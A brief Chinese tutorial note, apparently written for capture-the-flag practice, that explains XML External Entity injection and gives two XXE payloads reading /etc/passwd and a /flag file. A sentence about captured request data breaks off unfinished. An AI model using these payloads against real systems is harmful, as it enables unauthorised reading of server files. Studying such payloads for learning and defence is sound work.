XXE漏洞全称XML External Entity Injection 即XML外部实体注入。
**有禁止外部实体的加载,导致可加载恶意外部文件和代码,造成任意文件读取、命令执行、内网端口扫描、攻击内网网站、发起Dos攻击等危害。
XXE漏洞触发的点往往是可以上传xml文件的位置,没有对上传的xml文件进行过滤,导致可上传恶意xml文件。
当burp抓包时显示传入的数据为
可以在xml报文前添加恶意报文致使获取权限访问根目录
#查找根目录
<?xml version=”1.0” encoding=”utf-8”?>
<!DOCTYPE note [
<!ENTITY admin SYSTEM “file:///etc/passwd”>
]>
#获取flag
<?xml version=”1.0” encoding=”utf-8”?>
<!DOCTYPE note [
<!ENTITY admin SYSTEM “file:///flag”>
]>